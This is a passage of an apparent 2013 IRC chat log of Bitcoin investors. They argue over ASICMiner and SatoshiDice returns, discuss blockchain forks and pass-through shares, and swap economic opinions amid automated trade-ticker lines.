15:39:26 mp last week was .0011 May 11 15:39:31 maybe more May 11 15:39:35 let me explain this better : May 11 15:39:41 ;;calc 20007 / 4 / 400000 May 11 15:39:41 0.012504375 May 11 15:39:49 last week was .0011 and that was not with selling anything May 11 15:39:55 just being 20% of the network May 11 15:39:56 you need to hit 0.012 for 4 weeks straigjht to equal s.dice May 11 15:40:06 that's 10x what it's doing now, for 4 weeks straight. May 11 15:40:13 lol dice May 11 15:40:19 mp, that will happen May 11 15:40:36 ThickAsThieves maybe it will. he was arguing really strongly that am is a contender two days ago. May 11 15:40:45 i did the math, turns out he's a degree of magnitude off, as per usual May 11 15:41:01 the funny thing with Chaaang-Noi is that math illiterate people are equally likely to blow a degree of magnitude either direction May 11 15:41:10 am has been paying out for 2 months, sdice for a year, but like i said, come back in a year andsee what is up :) May 11 15:41:10 he however only blows it the direction that favours his bias. May 11 15:41:12 theyll keep selling products, and ramping up hash rate to keep or exceed current % for at least month May 11 15:41:24 and then he'll probably announce some new product May 11 15:41:51 ThickAsThieves maybe so. this discussion is not about the future however. May 11 15:41:57 word May 11 15:42:02 mp im not sure what you are attacking? its pretty clear am is better investment at ipo than s dice, why is it so hard for you to understand? May 11 15:42:25 Chaaang-Noi you claimed coupla days ago that am is going to pay more div than s.dice May 11 15:42:26 yeah, the future counts, if you only want to look at the last 2 months AM kills s.dice May 11 15:42:31 it is not, and it's not even close, at all. May 11 15:42:31 sdice got a PR person, thats a good sign May 11 15:42:52 of course that person's wages will polish off 10-25% of profits this month... May 11 15:43:00 mp AM will in its lifetime pay shit loads more than sdice as a percentage of money invested May 11 15:43:12 sigh. May 11 15:43:20 Chaang we d can't know that May 11 15:43:26 look. s.dice has maid and paid ~70k btc so far. May 11 15:43:32 SDICE can still turn things around May 11 15:43:34 i know, that is why i said i will come back in a yeah and lulz May 11 15:43:46 asicminer is a. never got that much invested ; b. never got that much traded in its lifetime history ; c. barely paid 10% of that in dividends so far. May 11 15:43:53 they were both started about the same time (april 2012) May 11 15:44:05 that's the whole story. stop confounding your hopes for the future with the history of the world, May 11 15:44:07 they're not cognates. May 11 15:44:23 mp who cares what a company pays out, im talking about making the most btc per money invested (what is better 5 btc on 1 btc invested or 234095834 on 340958039458908345098304958093459034 invested? May 11 15:44:42 not everybody is desperately trying to turn their fifty bucks into a million. May 11 15:44:58 AM is up what 1500% and paid 3005 in divs? s.dice is what down 20% and paid what 30% in divs? lol May 11 15:44:59 and quite frankly i dislike that particular outlook because it's just bad for business, and for bitcoin in general. May 11 15:45:18 well mp, i could give a flying fuck and think you are just jelly :) May 11 15:45:43 sure, you tend to think whatever's convenient at the moment, May 11 15:45:51 which is why only new people give a shit what you think. May 11 15:45:55 i turned 5k usd into a millionn, so the fuck what? May 11 15:45:59 wait..you can turn fifty bucks into a million with this bitcoin stuff May 11 15:46:03 back to the matter at hand : pumping is a bad idea. universally. May 11 15:46:10 and will end in bitchslapping. universally. May 11 15:46:12 gigavps is dead. May 11 15:46:13 i could care less what people think about me, im a fucking goat! May 11 15:46:27 you're more resilient than him because you have no backbone, but that doesn't amount to much. May 11 15:46:33 i could use some pumps yo..where they at May 11 15:46:40 krs1 k5 usd worth of AM at ipo is worth about a million or so now May 11 15:46:52 goddamn May 11 15:47:07 mp going to attack my backbone cuz he cant take my logic :? jelly man, its jsut sad May 11 15:47:12 and i probably remember looking at the shares and bein all like..pfft. May 11 15:47:42 ill be riddin in my lambo, mp be hatin, May 11 15:47:59 they see me rollin...they hatin.... May 11 15:48:30 i will be May 11 15:48:37 usually..i stepped up the ante a bit lately though. May 11 15:48:53 Chaang-Noi be like..."I WOKE UP IN A NEW BUGATTI" May 11 15:49:04 thats gangster May 11 15:49:19 good for you bro.. May 11 15:49:20 fuck they are like 3.5 million euro? May 11 15:49:37 yeh..its a new rap song too. May 11 15:49:40 even if i had that to spend on a car id not May 11 15:49:46 Chaaang-Noi you got a mil in AM? May 11 15:49:59 i dun like the song though its annoying May 11 15:50:01 kako ill ahve to do the maffs hold on May 11 15:50:07 Chaaang-Noi: sell. May 11 15:50:16 although I'd be nervous about those shares.. May 11 15:50:31 must be really nice dividends May 11 15:51:11 I bought my first 100 AM shares from Chaang May 11 15:51:15 my 5k usd investment would not be worth 957,000 at current prices, but i ahve been slowly selling all the way up so no, i dont have a million in AM (oh but shit, forgot about all the dividends,that is just stock price) May 11 15:51:34 id say i made ball park 800k usd in AM May 11 15:51:35 id pull out May 11 15:51:40 but i really killed it in LTC May 11 15:51:51 LTC still have room to go? May 11 15:51:54 400k ltc, muhahahaha May 11 15:52:03 iv been selling ltc hard since 6$ May 11 15:52:13 this is kinda interesting https://bitcointalk.org/index.php?topic=195523.0 May 11 15:52:15 nice May 11 15:52:28 ijust sold 5k more tonight and 10k last night May 11 15:52:32 does it still have future value and growth in your opinion? May 11 15:52:35 im moving all that shit back into btc May 11 15:52:50 but wtf am i going to do with a dirt house in germany? May 11 15:52:50 i still cant belive those ltc are valued so high May 11 15:52:56 kakop im shocked too May 11 15:53:01 still $3! May 11 15:53:09 meh May 11 15:53:18 mp will get jelly and go burn it down May 11 15:53:22 ltc is like bitcoin 3years ago May 11 15:53:28 5 scam sites accept it May 11 15:53:30 so that should say something about the future of ltc May 11 15:53:46 not necessarily May 11 15:53:47 kako i think gox will not list it, and people will lose interest, i might buy back in when it goes way less than it is now May 11 15:53:56 i only hold like 100k now, sold more for btc (some fiat) May 11 15:54:20 there be like 2k altcoins now, but namecoin and ltc has been around May 11 15:54:33 ltc only real use is an instrument to play off BTC May 11 15:54:42 you can mine w GPU to sell for BTC May 11 15:54:53 thats the only value I see imo May 11 15:54:53 you can speculated a bit against BTC/USD May 11 15:55:05 speculate* May 11 15:55:27 without BTC, LTC is useless May 11 15:56:00 lol May 11 15:56:05 but not the other way around right? May 11 15:56:09 if btc breaks or forks itself ltc is all we gotz May 11 15:56:21 not true May 11 15:56:24 just pick a fork May 11 15:56:35 i mostly got into ltc so hard cuz i thought if btc forks itself ltc willbe king May 11 15:56:36 both could even coexist May 11 15:56:52 well, maybe i got lucky, i dont give a fuck May 11 15:56:55 on same blockchain? May 11 15:57:21 if it forked there'd be two chains May 11 15:57:32 and we dont know how peopel would react May 11 15:57:40 maybe they respect both separately May 11 15:57:46 and the value halves May 11 15:57:48 i dunno May 11 15:57:57 some btc would not be able to be verified right May 11 15:58:20 maybe someone makes BTC 2.0 plan and lets peopel migrate May 11 15:58:40 maybe dev should come with a plan in the case of a real fork May 11 15:58:41 like Luke-Jr who say a 51% attack of LTC will happen with a few FPGA's May 11 16:00:03 [MPEX] [S.MPOE] 1920 @ 0.00068918 = 1.3232 BTC [-] May 11 16:00:06 [MPEX] [S.MPOE] 10303 @ 0.00068375 = 7.0447 BTC [-] May 11 16:00:08 [MPEX] [S.MPOE] 11050 @ 0.00068374 = 7.5553 BTC [-] May 11 16:00:16 [MPEX] [S.MPOE] 4827 @ 0.00068 = 3.2824 BTC [-] May 11 16:03:14 lol, people are still bidding on those AM blades knowing auction is over, in hopes of forming a queue for next offering May 11 16:04:34 my bfl rig should be here in a couple of weeks..wish the goddamn difficulty would drop or something. May 11 16:05:07 KRS1, how can it drop? May 11 16:06:12 ThickAsThieves the model is something like this : May 11 16:06:25 whoever has enough money to matter is likely to pick one chain for whatever reason May 11 16:06:28 it can go up or down May 11 16:06:32 since fork means btc can be spent independently on either chain May 11 16:06:40 he will sell his btc on one and perhaps buy on the other. May 11 16:06:56 [BTCTC] [ASICMINER-PT] 1 @ 1.495 BTC [+] May 11 16:06:56 as a result prices will rapidly diverge, panicking the mass of users, and the fork is economically resolved. May 11 16:07:02 mircea popescu: is it possible there is validation data in both chains that each doesnt know about the other? May 11 16:07:18 KRS1 im not sure how you mean ? May 11 16:07:31 [BTCTC] [ASICMINER-PT] 4 @ 1.4974 = 5.9896 BTC [+] May 11 16:08:12 from what i understand the transactions move data through the blockchain so if it splits, there could be transactional or validation data split up as well, maybe lost btc? May 11 16:08:20 [BTCTC] [ASICMINER-PT] 8 @ 1.4975 = 11.98 BTC [+] May 11 16:08:28 maybe i have it wrong May 11 16:08:31 idk May 11 16:08:32 i think you do. May 11 16:08:39 ill go read up on it May 11 16:08:46 chains are just that, sequences of blocks, which are made up of txs May 11 16:08:54 if the chain splits there's basically two distinct histories May 11 16:08:58 yeah 100 bids or 200 bids on the 50 AM blads :) May 11 16:08:59 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [+] May 11 16:09:04 which means everyone has 2x as many btc as he used to have : half on each fork May 11 16:09:20 and a split on the price May 11 16:09:27 kind of like a stock split May 11 16:09:29 not necessarioly an even split is what i mean. May 11 16:09:38 halving May 11 16:09:38 people with weight will just pick, sell the loser buy the winner May 11 16:09:41 [BTCTC] [ASICMINER-PT] 7 @ 1.4989 = 10.4923 BTC [+] May 11 16:09:52 price will then diverge towards one chain closing in to 100% of the total. May 11 16:09:55 or sell both and see what happens May 11 16:10:03 or that yes, but that's neutral for our model May 11 16:10:06 so its still a nasty situation..sounds sugar coated May 11 16:10:08 ie selling both or buying both doesn't matter. May 11 16:10:15 i don't see what's nasty about it. May 11 16:10:50 oh it equals out..the real loss is the panic May 11 16:11:02 well, you can see panic as an investment May 11 16:11:24 the drop from 260 to 100 was certainly an investment. people lost money in order to prove bitcoin is not a pump asnd dump. May 11 16:11:35 forking btc will be very bad for image, not so bad for btc (unless you personally lost transactions) May 11 16:13:19 thats why there should be a plan May 11 16:13:27 if there were an established plan May 11 16:13:35 that would instill notable confidence May 11 16:13:38 even today May 11 16:13:59 they could even write it into the software May 11 16:14:17 like if fork, then respect fork that = X May 11 16:14:22 it's not a software issue. May 11 16:14:32 it's a moneybags issue, and who's to say they don't have a plan ? May 11 16:14:39 i'm just thinking conceptually May 11 16:14:51 even so. not all problems are approachable in code. May 11 16:14:54 in fact, most aren't. May 11 16:15:20 there is however a messaging system build into most clients, to notify merchants if there's a split etc. May 11 16:15:31 on the recent fork it proved itself to work quite well. May 11 16:16:18 yeah, although mining pool operators being in communication quickly was the real save May 11 16:16:39 or mining pools being willing to lose money. May 11 16:16:51 i have serious doubts that's happening again. ideally it won't need to. May 11 16:17:03 [HAVELOCK] [VTX] 1 @ 0.4659 BTC [+] May 11 16:17:05 [HAVELOCK] [VTX] 25 @ 0.466 = 11.65 BTC [+] May 11 16:19:36 ;;ticker May 11 16:19:37 BTCUSD ticker | Best bid: 116.57001, Best ask: 117.00000, Bid-ask spread: 0.42999, Last trade: 116.57001, 24 hour volume: 42762.58612031, 24 hour low: 114.00000, 24 hour high: 122.00000, 24 hour vwap: 118.05232 May 11 16:20:54 [BTCTC] [ASICMINER-PT] 1 @ 1.4989 BTC [+] May 11 16:21:59 [BTCTC] [GSDPT] 10 @ 0.00304 = 0.0304 BTC [+] May 11 16:22:26 [BTCTC] [BITVPS] 20 @ 0.00098 = 0.0196 BTC [-] May 11 16:24:15 [BTCTC] [S.MPOE-PT] 19 @ 0.000695 = 0.0132 BTC [-] May 11 16:25:54 See, Chaaang-Noi was saying what I was trying to say "lost transactions" May 11 16:26:15 [BTCTC] [S.DICE-PT] 1 @ 0.00349 BTC [+] May 11 16:49:13 KRS1: transactions don't get lost, in case of a chain fork they should get included in both chains May 11 16:49:41 yeah but they can be double spent May 11 16:50:35 not in the usual meaning of "double spend" though May 11 16:51:20 they can be spent once, each time on one branch, but that's only sort of a double-spend May 11 16:52:31 but spending them to different recipients on each chain would require some careful manual crafting, i'm not even sure it would be practically feasible May 11 16:55:47 you wouldhave to be ready for it, but i think it can be done May 11 17:02:03 [BTCTC] [S.DICE-PT] 111 @ 0.003005 = 0.3336 BTC [-] May 11 17:03:51 [BTCTC] [BITVPS] 80 @ 0.00098 = 0.0784 BTC [-] May 11 17:04:56 [BTCTC] [BITVPS] 350 @ 0.00099 = 0.3465 BTC [+] May 11 17:06:07 Chaaang-Noi: thinking about it, it wouldn't be that hard, would simply mean you'd have to craft different txes spending the same coins, to different recipients, that you know are on different branches, and broadcast them in a controlled way, the last part sounds like it'd be the hardest May 11 17:26:30 ok, here goes : http://trilema.com/2013/the-conference-second-edition/ May 11 17:26:40 and now for my spamlist! May 11 17:26:49 B0g4r7 b0n1 bgupta BitHub blacktape BTCOxygen burnside bVector May 11 17:26:54 Chaaang-Noi cheebydi coingenuity ColdHardMetal copumpkin Cory May 11 17:28:17 asciilifeform burnside coingenuity davout DBordello Diablo-D3 dub FabianB_ imsaguy jborkl jcpham kakobrekla leotreasure mod6 nanotube pgp rdponticelli smickles_ ThickAsThieves thestrin1puller topace_ and everyone else ^ May 11 17:29:25 people are going to say you copied reptillia May 11 17:29:49 only people who weren't there at the 1st one lol May 11 17:30:07 that will be most people May 11 17:30:14 indeed. May 11 17:30:40 o ya i guess Ukto idles alot so he might miss it. ^ May 11 17:31:00 he is back, jhe was traveling May 11 17:31:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.01469 = 0.0294 BTC [-] May 11 17:31:37 reptillia was too soon, your thing is ages away :/ May 11 17:31:54 the fiorst edition was actually planned/invites sent in jan/feb. May 11 17:31:56 i plan ahead. May 11 17:32:03 this is a year from now May 11 17:32:05 almost May 11 17:32:10 yup May 11 17:32:27 sure 3 to 6 months is fine, but a year :) people will forget May 11 17:32:39 forget lol May 11 17:33:06 Chaaang-Noi: looks like a functional brain will be required to attend May 11 17:33:23 :-) May 11 17:33:50 Chaaang-Noi cheebydi coingenuity ColdHardMetal copumpkin Cory May 11 17:34:15 nothing wrong with planning this far ahead, just kinda shocked May 11 17:34:26 it is kinda shocking May 11 17:34:58 the VIP title however is lulz May 11 17:35:03 i hope reptillia gets one May 11 17:35:04 Well, you can't say you weren't prepared... :p May 11 17:38:09 what exactly does the vip get other than a bill and a title? May 11 17:38:27 do they become a super node? May 11 17:38:49 lol May 11 17:39:05 Chaaang-Noi doesn't like to read. May 11 17:39:26 i saw little of value gained May 11 17:39:47 give yourself time. May 11 17:42:33 seems like some extra food for the vips May 11 17:42:45 everybody else gets rice and beans May 11 17:42:53 rice and soy sauce. May 11 17:43:02 why no asicminer on mpex? May 11 17:43:14 mircea_popescu: you mean vips get rice&beans, and the regulars get romanian food ? May 11 17:43:19 :p May 11 17:43:34 AM would never work with mpex May 11 17:43:50 how come? May 11 17:44:12 AM will not list on any exchange May 11 17:44:20 its not just mpex May 11 17:44:33 yeah i know, but cant they just create an asset like the other PT's? May 11 17:44:55 BitHub the friedcat guy won't sign contracts basically. May 11 17:44:58 yeah, but MP would have to first buy AM stock, and he has been trying to short it since it was at .5 May 11 17:45:11 ahh okey May 11 17:45:15 why would i have to buy anything ?! May 11 17:45:30 you coudl sell counterfiet shares i guess May 11 17:45:35 hehe May 11 17:45:59 i have no idea wtf you're on about nao. May 11 17:46:12 trust is an issue with the otehr exchanges, but the real reason is, AM does not need an exchange, AM has all the oney it will ever need and more May 11 17:46:17 i think peeps would bring shares to mpex May 11 17:46:24 mp take some tim MP, you are a smart chap May 11 17:46:36 tehy could May 11 17:47:01 but its teh contracts prob with Mr Friedcat May 11 17:47:14 being listed is not about asicminer's monwey. May 11 17:47:21 it's about the investors. May 11 17:47:47 friedcat has never contacted MP about listing on mpex, and i doubt MP has asked friedcat to list, but maybe he has, but anyway why the fuck would friedcat list? more risk, nothing gained May 11 17:48:16 the investors would be very upset if their shares were moved to mpex, however im sure if you wanted to do a pt no one would care May 11 17:48:19 i think other PT's just did it on their own yeah? or did they have to get permission too? May 11 17:48:27 pt are not real shares May 11 17:48:57 no one has to get permission to run a pt cuz they are not really selling AM shares May 11 17:49:12 okey, you just have to back the PT asset with real shares May 11 17:49:19 well you should... May 11 17:49:24 but no, you dont ahve to May 11 17:49:35 lulz May 11 17:49:36 you could do so as a short May 11 17:49:41 man this stuff gets confusing May 11 17:49:47 well... May 11 17:50:05 its best not to trust pts or exchanges if you dont have to May 11 17:50:24 say 50 mpex users had asicminer shares direct with friedcat, and they wanted to create an assset on mpex with the shares May 11 17:50:29 i mean they could do that right? May 11 17:50:52 liek someguy who sold 40,000 share of pirate pts who expected pirate to fail, could ahve just kept the money and paid the 5 or 6 weeks of interest May 11 17:51:01 once pirate failed they would ahve made shit loads of btc May 11 17:51:03 [HAVELOCK] [VTX] 1 @ 0.4262 BTC [-] May 11 17:51:58 you have to read the fine print of the pts to know if they are back by anything May 11 17:52:22 cool, sorry to drag it on, just curious :) May 11 17:52:36 that is why this chan is here May 11 17:52:40 talking about assets and the like May 11 17:52:56 cool, i love assets :) May 11 17:53:35 are we caught in an asicminer bubble? May 11 17:54:03 Chaaang-Noi cheebydi coingenuity ColdHardMetal copumpkin Cory May 11 17:54:03 [HAVELOCK] [ASICM] 20 @ 0.01512 = 0.3024 BTC [+] May 11 17:54:05 Lee- leotreasure Line_ lippoper ll_ Luke-Jr May 11 17:54:05 Lee- leotreasure Line_ lippoper ll_ Luke-Jr May 11 17:55:39 i think it is under valued May 11 17:55:47 mircea_popescu: so Argentinia not before spring 2014 i guess :) May 11 17:55:49 they are the only guys in town who can mass produce assics May 11 17:55:55 and people are buying them at insane prices May 11 17:56:02 yep May 11 17:56:13 those recent ones sold out in 2 hours May 11 17:56:13 FabianB_ kinda that summer. May 11 17:56:20 at around 50btc each May 11 17:56:32 plus month or two going to insane hashrates yeh? May 11 17:56:34 120 sold and oly 50 listed :) May 11 17:56:54 well, if we control the market we dont care what the hash rate is May 11 17:57:03 [HAVELOCK] [ASICM] 5 @ 0.01512 = 0.0756 BTC [+] May 11 17:57:38 what's impressed me the most is that unlike bfl and avalon ontop of selling devices they are opening mining as well May 11 17:57:58 openly* May 11 17:58:41 so i guess 3btc a share at some point this year is doable? May 11 18:00:04 well, keep in mind they keep paying out weekly dividends, share price is not the goal, total profit for the ipo holders is the goal May 11 18:00:23 [BTCTC] [ASICMINER-PT] 3 @ 1.4988 = 4.4964 BTC [-] May 11 18:00:27 we might hit 3 btc each i dont know, but dividends paid out plust share price will be pretty awesome May 11 18:00:56 mjr___ here you signup lol May 11 18:01:07 ipo holders = shares direct with friedcat? May 11 18:01:22 well at this point all stock holders May 11 18:01:44 but the goal is not stock prices, its total btc in the pocket of the investors or stock holders May 11 18:01:59 that is a good goal :) May 11 18:05:15 ;;bc,convert eur May 11 18:05:15 1 BTC = 116.00000 U.S. dollars = 89.3544908 Euros May 11 18:12:30 [BTCTC] [ASICMINER-PT] 5 @ 1.4988 = 7.494 BTC [-] May 11 18:13:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.01489 = 0.0298 BTC [+] May 11 18:13:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.014899 = 0.0745 BTC [+] May 11 18:13:49 [BTCTC] [TAT.ASICMINER] 26 @ 0.0149 = 0.3874 BTC [+] May 11 18:14:04 [HAVELOCK] [ASICM] 2 @ 0.01512 = 0.0302 BTC [+] May 11 18:15:03 [HAVELOCK] [ASICM] 1 @ 0.01512 BTC [+] May 11 18:18:44 [BTCTC] [ASICMINER-PT] 1 @ 1.4988 BTC [-] May 11 18:20:00 !ticker h asicm May 11 18:35:28 all is well in bitfunder land https://bitcointalk.org/index.php?topic=130117.msg2111032#msg2111032 May 11 18:36:11 got islanded huh May 11 18:36:11 regarding AM PTs, May 11 18:36:37 I will actually be the first to make it easy for anyone to check how many shares I hold at any time May 11 18:37:04 oh mp, trolling your girl is too easy May 11 18:37:32 after this current large deal closes, I'll share all my holding of whole-share PT shares, as well as shares with Friedcat May 11 18:37:48 if anyone needs proof of PT shares I can do that any time May 11 18:38:00 just waiting for Friedcat on the otc share proof May 11 18:38:42 cool tat May 11 18:38:45 TAT i was not attacking you, i was just saying it could be done May 11 18:38:51 oh i know May 11 18:38:54 any might have been done before, with something like pirate May 11 18:39:04 i planned to announce this on all forums this weekend May 11 18:39:12 you just incited me to preview my intentions May 11 18:39:15 :) May 11 18:39:20 :) May 11 18:39:30 kind of like a google doc or something? May 11 18:39:38 nope May 11 18:39:45 just think about someone doing that with pirate.. would ahve made millions of fiat, May 11 18:40:03 I'll share my wallet address that is registered with Friedcat May 11 18:40:07 and sign a message from it May 11 18:40:14 anyway, im off, peace all May 11 18:40:23 and then share my public link in BTCT to show any PT shares I hold May 11 18:40:25 peace, thanks for the tips May 11 18:40:41 the wallet address will also be the same address registered in the Bitfunder Asset list May 11 18:40:56 so you'll be able to see ant G.assicminer shares I hold there as well May 11 18:41:09 hehe does anyone ever ask about your name? May 11 18:41:14 no May 11 18:41:38 I wouldnt have a problem with it, if bitcoiners werent also nutters May 11 18:41:42 it kind of throws me off May 11 18:42:10 I think my identity only being need-to-know is better for shareholders too May 11 18:42:26 prevents social engineering, personal security issues, etc May 11 18:43:01 I'll also be issuing a security report for the TAT assets May 11 18:43:18 confirming 2fa on all accounts, dead man switch in place, etc May 11 18:43:35 cynide cap in tooth? :P May 11 18:43:50 i do need to have some wisdom removed... May 11 18:43:58 cyanide May 11 18:44:01 teeth* May 11 18:44:11 i need all the wisdom i can get May 11 18:44:42 i know what you're saying, just giving you some feedback, seeing the word thieves doesn't fill me with confidence :) May 11 18:45:25 I understand, and people bring that up less than I expected May 11 18:46:20 if your name was cryptobond or something, i would feel alot better May 11 18:46:40 hehe May 11 18:46:44 well if it helps, May 11 18:46:54 the name is a reference to a cliche May 11 18:47:05 from the movie The Shawshank Redemption May 11 18:47:14 oh god May 11 18:47:17 not that movie :P May 11 18:47:36 It means "Cliché: very close-knit; friendly; allied. " May 11 18:47:41 couldn't reference a sergion leone? :) May 11 18:47:45 sergio May 11 18:47:45 loyal May 11 18:48:30 are you going to do another asset soon? May 11 18:48:45 or just am for now May 11 18:49:02 i have some things brewing May 11 18:49:10 but nothing immediate May 11 18:49:52 right now I'm focusing on the AM PTs pretty hard May 11 18:50:09 and there are plans within that May 11 18:50:30 releasing on Havelock was the first thing I had to get out of the way May 11 18:50:48 it's the first PT on Havelock not run be the owner May 11 18:50:55 by* May 11 18:51:16 next is promoting the proof of share ownership and security May 11 18:51:40 then I'm considering some other moves for the asset May 11 18:52:04 I will not be putting it on litecoinglobal, though it was considered May 11 18:52:40 the work involved was simply not worth it with the volume May 11 18:52:55 how about arb/share transfer? May 11 18:52:56 oh cool thats you on havelock May 11 18:53:05 jurov, that is under consideration May 11 18:53:11 it's the first PT on Havelock not run be the owner << wow didn't realise that. May 11 18:53:43 share arb and transfer is something intrested in doing May 11 18:54:03 my main concern with allowing share transfer is the work May 11 18:54:14 but i'm also not sure if it's worth it yet May 11 18:54:19 btw mircea_popescu, thx for the heads-up aout the conference May 11 18:54:30 hehe is mircea going? May 11 18:54:55 hehe, like, we come into timisoara and he won't be there? May 11 18:55:22 each of the exchanges has different requirements for what I'm allowed to do, so currently my AM PT is the lowest common denominator of those requirements May 11 18:55:36 be kind of awkward mircea bringing the only girls there? May 11 18:56:00 jurov ye May 11 18:56:13 no, awkward was that few of us had own girls to bring with May 11 18:56:24 or guys May 11 18:56:27 for reals? May 11 18:56:29 It seems like a trip taht would be better without the wife... May 11 18:56:58 but unlikely I could go without her May 11 18:57:00 dunno, m0mso's wife and sister seemed to enjoy it May 11 18:57:45 also seems like possibly very vegan-unfriendly event May 11 18:58:02 don't mind other people eating mind per se May 11 18:58:15 a bbq would be pretty good May 11 18:58:21 just not sure if Romanians will be like "vegan? gtfo!" May 11 18:58:55 vampires might not even want my blood May 11 18:59:12 lol i guess they already met someone such in 4* hotel and can accomodate May 11 18:59:24 sprinkle some rust on it May 11 18:59:58 theyll slap me around with horse/eel sausage May 11 19:00:13 oh, what's with your blood? May 11 19:00:33 it has no meat-eater nutrients May 11 19:01:18 i imagine romanian vampires to be quite discerning May 11 19:01:29 maybe there are some vegan vampires that prefer grass-fed cattle May 11 19:01:34 organic May 11 19:01:40 free range May 11 19:01:41 hehe May 11 19:01:55 like some sort of hipster vampire May 11 19:04:53 BitHub i didn't bring the onl;y girls there tho May 11 19:05:46 just not sure if Romanians will be like "vegan? gtfo!" << naw not rly. May 11 19:05:54 the argentines i hear take away your passport tho. May 11 19:07:29 i like argentinian wine best May 11 19:09:29 i think you might change your mind after trying the local stuff. May 11 19:09:40 wences had something to do with the move? :) May 11 19:09:41 i had a vegan guy once... smelled like vegetables, it was actually tasty May 11 19:10:40 i dont drink wine much, but the wife does, I like the dry aspect of malbecs May 11 19:12:08 kakobrekla nah, was eyeing south america for a while. May 11 19:14:40 i guess i'm going to give away local wine again, it was a hit. May 11 19:20:52 hm May 11 19:21:11 well argentina is big, its not so hard to find a suitable location i guess May 11 19:33:31 just read the wiki on the Romanian Revolution, pretty cool May 11 19:47:02 ;;ticker May 11 19:47:02 BTCUSD ticker | Best bid: 116.39998, Best ask: 116.40000, Bid-ask spread: 0.00002, Last trade: 116.39999, 24 hour volume: 28858.01633496, 24 hour low: 114.00000, 24 hour high: 119.59998, 24 hour vwap: 116.89644 **** ENDING LOGGING AT Sat May 11 20:02:08 2013 **** BEGIN LOGGING AT Sat May 11 20:06:10 2013 May 11 20:06:23 [BTCTC] [PAJKA.BOND] 3 @ 0.104 = 0.312 BTC [-] May 11 20:08:28 [BTCTC] [B.YABMC] 6 @ 0.0145 = 0.087 BTC [-] May 11 20:09:04 [HAVELOCK] [VTX] 5 @ 0.4278 = 2.139 BTC [+] May 11 20:09:53 lol Zzzzzzzz May 11 20:09:56 [BTCTC] [B.YABMC] 10 @ 0.014 = 0.14 BTC [-] May 11 20:11:04 [HAVELOCK] [ASICM] 150 @ 0.01512 = 2.268 BTC [+] May 11 20:12:15 [BTCTC] [B.YABMC] 1 @ 0.01279 BTC [-] May 11 20:13:15 [MPEX] [S.MPOE] 17900 @ 0.00068204 = 12.2085 BTC [+] May 11 20:14:23 [BTCTC] [B.YABMC] 1 @ 0.01275 BTC [-] May 11 20:15:16 [BTCTC] [B.YABMC] 7 @ 0.012608 = 0.0883 BTC [-] May 11 20:17:01 [BTCTC] [ASICMINER-PT] 1 @ 1.49998 BTC [+] May 11 20:20:09 http://delong.typepad.com/sdj/2013/05/the-washington-super-whale-hedge-fundies-the-federal-reserve-and-bernanke-hatred.html May 11 20:20:12 this is pretty good. May 11 20:25:51 mircea_popescu: "the bezzle." May 11 20:26:10 what about it ? May 11 20:26:40 a a. yes. May 11 20:26:45 exacrtly. May 11 20:26:53 mircea_popescu: just the fact that the fake money will eventually circulate. and the consequences, etc. May 11 20:27:01 yup May 11 20:31:05 well, where's the fake money now and how can we see when it starts being spent? May 11 20:31:28 now it's just moved back and forth between banks and reserve? May 11 20:32:00 jurov: when the U.S. dollar price of your lunch equals today's price of a used car. May 11 20:32:42 obv but that's a consequence, not a cause May 11 20:32:57 jurov: yes, but that's the barometer to watch. May 11 20:33:38 i was thinking that maybe there's some thing to watch for *before* hyperinflation kicks in May 11 20:34:04 or are you saying it's past already? May 11 20:34:22 I predict that American hyperinflation will lead to counter-intuitively slow rises in the price of gold and BTC. From the fact that large gold/BTC holders stuck in America will be selling off their stashes to buy basic necessities. May 11 20:34:44 yeah, jurov : you can watch the stock exchange. May 11 20:34:50 the fact that the indexes are up is proof. May 11 20:35:04 the us economy was never this weak. not in 1950, not in 1939, never. May 11 20:36:47 well... yeah, maybe in 1820 or something. May 11 20:38:11 mircea_popescu: re: 1820: agrarian America, most people did not depend on a working economy as such for physical survival. no comparison. May 11 20:38:18 so all the fake money is circulating in stocks and forex atm? May 11 20:38:50 asciilifeform which is why i didn't consider it originally. but on a purely semantic basis it has to be pointed out. May 11 20:38:58 jurov pretty much. mostly us stocks. May 11 20:40:59 when considering the purpose of the fake money printing, I can think of two distinct goals: (1) keep the spreadsheets from failing checksum (prop up the charade of an American "economy") and (2) keep the hookers, cocaine, jets, etc. flowing to the "nobility" despite their total economic/social irrelevance. May 11 20:41:18 neither of these is the point. May 11 20:41:21 So I won't be surprised when at some point the charade ends and the tinted window fellows will be handed actual titles of nobility. May 11 20:41:24 the fed simply makes money on the bonds they buy. May 11 20:41:50 mircea_popescu: yes, but ultimately why. May 11 20:42:16 because the system is broken. May 11 20:42:24 understand, cancerous cells aren't there conspiring to fuck up the body. May 11 20:42:34 they are there working dilligently at a bad definition of what the job is. May 11 20:42:45 mircea_popescu: yes, they're just hungry and stupid. May 11 20:42:50 and as a result fucking up the body. May 11 20:43:20 exactly. the fed is hungry and stupid. it goes "so we make 2% on 10trn which is 200bn and if we print another 10trn we make 400 bn instead ? go for it!" May 11 20:43:37 "what'as the worst that can happen, inflation ? that measn the economy has resuscitated, win" May 11 20:43:59 I predict .... counter-intuitively slow rises in the price of gold <<< i think that is only possible if fed somehow proves the gold is there May 11 20:44:31 what I suspect is that at some point there will be a shift to a rather different, more Latin American social order, where the nobles are simply given bank cards with $ PosInfinity balance May 11 20:44:32 jurov he obviously means the fake gold nobody wants anymore. May 11 20:44:41 and dispense with the elaborate spreadsheet charade. May 11 20:44:49 this is already the case. May 11 20:46:52 but, at the moment, there is still an effort to keep up the pretense that there is an actual economy, where physical goods are produced, bought and sold at a profit, plebes are paid salaries from a fraction of the proceeds, etc. May 11 20:47:17 the next step is the slow outright Sovietization May 11 20:47:41 the permanently-unemployed say hello to the kolkhoz, and so on May 11 20:47:45 "An analysis of Iksil's trades revealed that he was using Microsoft Excel excessively, making a number of formula errors that caused him to underestimate the risks of his positions." May 11 20:47:49 this is pretty grand. May 11 20:48:01 how can anything major happen slowly in current situation? May 11 20:48:20 jurov practically speaking, because the world is mostly made out of Chaaang-Nois. May 11 20:48:26 jurov: inertia. May 11 20:48:59 there's never a shortage of people who, if forced to eat shit by the spoon, would rather claim this savarine is wonderful May 11 20:49:03 than admit they're eating shit. May 11 20:49:11 in fact, there's rarely not a majority available. May 11 20:49:16 this is how force works, fundamentally. May 11 20:49:48 with the little twist that ultimately if you eat shit instead of food long enough, you die. May 11 20:50:44 niot really. May 11 20:50:57 if it's poorly digested 